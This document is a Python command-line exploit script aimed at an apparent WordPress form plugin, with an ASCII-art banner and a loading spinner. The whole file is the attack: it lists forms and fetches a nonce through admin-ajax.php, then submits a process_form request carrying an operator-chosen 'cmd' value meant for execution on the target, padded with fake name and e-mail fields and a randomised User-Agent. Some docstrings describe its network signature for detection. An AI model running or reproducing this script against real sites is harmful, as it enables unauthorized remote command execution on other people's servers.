import requests
from faker import Faker
from urllib.parse import urlparse
import time
import sys
import click
# Silence urllib3's InsecureRequestWarning for the whole process.  Note that
# none of the requests.post() calls in this file pass verify=False, so TLS
# certificate verification is still performed and this suppression is inert
# for the visible code.
_urllib3 = requests.packages.urllib3
_urllib3.disable_warnings(_urllib3.exceptions.InsecureRequestWarning)
# ASCII-art banner printed by ExploitScript.display_banner(); purely cosmetic.
banner = r"""
.=+*+++-
=#***#**##.:-.
-#**#####*#*.:
:#*#%@#+#@%#.-
=##*%##***#%=**#*=-.
***#*%#%#####*****+*=
-#%*############*=***+*+-
:%%#***#####*****#@#*#*#***+=:
.=#####**#*******#%%%####*******+-.
:*##%###*#*#%%##***%%%%%%%#**********#*+-
:*#******##%#####%%%%##***#%%%##***********:
=###****#***#***##*##********#%%%%#***********
:#********#**#*+*##*###**###+**###%%%%###****#**.
+#*********%***===++#+*##*=+=====+*##==*##%%%%#-
.=*#####***#%%%#**++===+++#*+++++++=++*## :::
:-*********##*=%%%#=++++++*++++++=====++++%%:
:=*#*********##- :%%%#+======================#%#.
=*##*********#*. .#%%%*+======================+#%*
.-+*##********#%#. .*%%#*+========+++++++=========##%*:
:*******#***##%#= :*%%%%**+=======================+***%%#=:::::-===========--:
.#***#*###**##%%%+=+#%%%%%%##*====================+*###%%%%%%#########***********=.
-*+=++=+*==+*+*%#****###%%%%%%%%#***##*****#####*#%%%%%%%#%*************************
.*#==+==+==+##+=******###*#####%%%%%%%%%%%%%%%%%%%####*******###********************#=
:*#+=*==*==**#++#*********##*******######%%####*************##*****#***************##*
.##*#==*+=*=+#*##**************************#*==+++++*+*****************************#%%*
.#%%##**+*#*#*#******************************#+=====++++**#****************#***####%%%#.
:*%%%%%#*#***********************************#+=++===+***+****#####***#####**##%%%%%#=.
-%%%%%####***********************************++++==++*+*######*############%#%###*=
.::-*+*+#%%#*##******+*##*#####*---...::=*+++##***+*++=---:=+:++-%*==+--:.: . .
..--:-==--: .:+##+-.
"""
class ExploitScript:
    """Drive a three-step request chain against the target's admin-ajax.php.

    Every request in this class goes to ``<scheme>://<netloc>/wp-admin/admin-ajax.php``.
    The ``action`` values used, in order, are ``form_search``, ``form_nonce`` and
    ``process_form``; only the last one carries the ``cmd`` field.  Together with
    the randomised Faker User-Agent on the final request, that sequence is the
    observable network signature of this script, which is what a detection rule
    would key on.
    """

    def __init__(self, url: str, cmd: str) -> None:
        """Store the target URL and the ``cmd`` value to send.

        ``form_id`` stays ``None`` until ``fetch_form_id`` has prompted the
        operator for one.
        """
        self.url = url
        self.cmd = cmd
        self.form_id = None

    @staticmethod
    def display_banner() -> None:
        """Print the module-level ASCII-art banner."""
        print(banner)

    @staticmethod
    def spinner(duration: float = 10, interval: float = 0.1) -> None:
        """Animate a spinner on stdout for roughly ``duration`` seconds.

        Purely cosmetic.  The deadline is only checked before each pass over the
        four spinner characters, so the real run-time can overshoot ``duration``
        by up to ``4 * interval`` seconds.  Ends by printing a newline.
        """
        spinner_chars = ["|", "/", "-", "\\"]
        end_time = time.time() + duration
        while time.time() < end_time:
            for char in spinner_chars:
                sys.stdout.write(f"\r[{char}] Exploit loading, please wait...")
                sys.stdout.flush()
                time.sleep(interval)
        print("")

    def get_base_url(self) -> str:
        """Return ``scheme://netloc`` of ``self.url``; path, query and fragment are dropped."""
        parsed_url = urlparse(self.url)
        return f"{parsed_url.scheme}://{parsed_url.netloc}"

    def fetch_form_id(self) -> None:
        """List the site's forms via ``action=form_search`` and prompt for one.

        On HTTP 200 the JSON body is expected to be a list of objects with
        ``id`` and ``name`` keys; there is no handling for a non-JSON body or
        missing keys, so those raise.  Any other status prints an error and
        exits with status 1 via the ``site`` builtin ``exit`` (not ``sys.exit``).
        The chosen id is read from stdin and stored, unvalidated, in
        ``self.form_id``.
        """
        base_url = self.get_base_url()
        req_url = f"{base_url}/wp-admin/admin-ajax.php"
        data = {"action": "form_search"}
        response = requests.post(req_url, data=data)
        if response.status_code == 200:
            form_data = response.json()
            ids = [item["id"] for item in form_data]
            names = [item["name"] for item in form_data]
            print("[+] Available Forms:")
            # `id` shadows the builtin inside this loop; harmless but worth knowing.
            for id, name in zip(ids, names):
                print(f" {id}: {name}")
            self.form_id = input("[+] Select Form ID >>> ").strip()
        else:
            print(f"[-] Failed to fetch forms: {response.status_code}")
            exit(1)

    def fetch_nonce(self) -> str:
        """Obtain the form nonce via ``action=form_nonce`` for the selected form.

        Calls ``fetch_form_id`` first, so this is where the interactive prompt
        happens.  The nonce is read from the ``data`` key of the JSON reply and
        defaults to ``""`` when that key is absent; a non-200 status prints an
        error and exits with status 1.
        """
        base_url = self.get_base_url()
        req_url = f"{base_url}/wp-admin/admin-ajax.php"
        self.fetch_form_id()
        data = {"action": "form_nonce", "form_id": self.form_id}
        response = requests.post(req_url, data=data)
        if response.status_code == 200:
            nonce = response.json().get("data", "")
            print(f"[+] Nonce Retrieved: {nonce}")
            return nonce
        else:
            print(f"[-] Failed to fetch nonce: {response.status_code}")
            exit(1)

    def prepare_payload(self) -> dict:
        """Build the ``action=process_form`` request body.

        Triggers the form-id prompt and the nonce fetch through ``fetch_nonce``.
        The name and e-mail fields are random Faker values; ``cmd`` is passed
        through from the constructor unchanged.
        """
        nonce = self.fetch_nonce()
        fake = Faker()
        payload = {
            "form_id": self.form_id,
            "nonce": nonce,
            "first_name": fake.first_name(),
            "last_name": fake.last_name(),
            "email": fake.email(),
            "action": "process_form",
            "cmd": self.cmd,
        }
        return payload

    def send_request(self) -> None:
        """POST the prepared payload to admin-ajax.php with a random Faker User-Agent.

        ``response.ok`` is only ``status_code < 400``; the response body is never
        inspected, so "delivered successfully" means the request was accepted,
        not that anything happened server-side.
        """
        base_url = self.get_base_url()
        req_url = f"{base_url}/wp-admin/admin-ajax.php"
        payload = self.prepare_payload()
        headers = {"User-Agent": Faker().user_agent()}
        response = requests.post(req_url, data=payload, headers=headers)
        if response.ok:
            print("[+] Exploit delivered successfully.")
        else:
            print(f"[-] Exploit failed: {response.status_code}")
@click.command()
@click.option("--url", required=True, help="Target URL")
@click.option("--cmd", default="/tmp/test", help="Command to execute")
def main(url: str, cmd: str) -> None:
    """CLI entry point: banner, a one-second spinner, then the request chain.

    The interactive form-id prompt and the nonce fetch happen inside
    ``send_request`` (via ``prepare_payload``), not here.
    """
    script = ExploitScript(url, cmd)
    # Both helpers are static, so call them on the class rather than the instance.
    ExploitScript.display_banner()
    ExploitScript.spinner(duration=1)
    script.send_request()
if __name__ == "__main__":
    # click parses --url/--cmd from sys.argv, so main() is invoked without arguments.
    main()